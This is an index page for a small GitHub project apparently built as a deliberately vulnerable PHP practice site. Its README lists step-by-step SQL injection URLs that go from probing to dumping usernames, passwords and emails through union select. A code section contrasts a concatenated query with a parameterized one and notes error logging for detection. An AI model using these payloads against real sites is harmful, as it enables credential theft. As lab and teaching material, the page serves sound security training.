Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ttibensky/hackme
website for code vulnerability testing (educational purposes only)
Last synced: 21 days ago
- Host: GitHub
- URL: https://github.com/ttibensky/hackme
- Owner: ttibensky
- Created: 2014-03-26T22:22:24.000Z (over 10 years ago)
- Default Branch: master
- Last Pushed: 2014-08-18T12:42:45.000Z (over 10 years ago)
- Last Synced: 2024-10-16T01:27:23.461Z (2 months ago)
- Language: PHP
- Size: 172 KB
- Stars: 1
- Watchers: 1
- Forks: 1
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
hackme
======

website for code vulnerability testing (educational purposes only)

### sql injection steps
1. Check for vulnerability

    http://hackme.dev/?id=%27

2. Find the number of columns (wait for error)

    http://hackme.dev/?id=1 order by 1
    ...
    http://hackme.dev/?id=1 order by 7

3. Check union select to identify columns

    http://hackme.dev/?id=1 union all select 1,2,3,4,5,6

4. Identify table names

    http://hackme.dev/?id=1 union all select 1,table_name,3,4,5,6 from information_schema.tables

5. Get columns from user table

    http://hackme.dev/?id=1 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name='user'

6. Now select * from user table

    http://hackme.dev/?id=1 union all select 1,username,password,email,5,6 from user

more examples here:
http://www.exploit-db.com/papers/13045/
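
The steps above work only because the `id` value is pasted into the SQL text. The following is an added example, not code from the hackme repository: it replays the README's own `id` values against a concatenating query and a validated, parameterized one. Python with an in-memory SQLite database stands in for the site's backend, and the six-column `article` table, the function names and the sample rows are assumptions made for illustration.

```python
import re
import sqlite3

# id values taken from the README steps, plus one benign request.
PAYLOADS = ["1", "'", "1 order by 7",
            "1 union all select 1,username,password,email,5,6 from user"]

def make_db():
    # Constructed stand-in data; only the `user` columns come from the README.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT,
                              author TEXT, views INTEGER, created TEXT);
        CREATE TABLE user (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO article VALUES (1, 'hello', 'first post', 'tom', 10, '2014-03-26');
        INSERT INTO user VALUES (1, 'admin', 'constructed-hash', 'admin@example.test');
    """)
    return db

def get_article_vulnerable(db, raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text.
    return db.execute("SELECT * FROM article WHERE id = " + raw_id).fetchall()

def get_article_hardened(db, raw_id):
    # Allow-list the input shape, then bind it as a parameter so it is only
    # ever compared as a value and never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT * FROM article WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(fn, raw_id):
    """Classify what one request does: ok, sql-error, leak or rejected."""
    db = make_db()
    try:
        rows = fn(db, raw_id)
    except sqlite3.Error:
        return "sql-error"   # input reached the SQL parser and broke the query
    except ValueError:
        return "rejected"    # input stopped before any SQL was built
    leaked = any("admin" in map(str, row) for row in rows)
    return "leak" if leaked else "ok"

if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), outcome(get_article_vulnerable, p), outcome(get_article_hardened, p))
```

A surfaced database error on the quote and `order by` requests is also the signal to alert on in application logs, since a parameterized endpoint never produces one for these inputs.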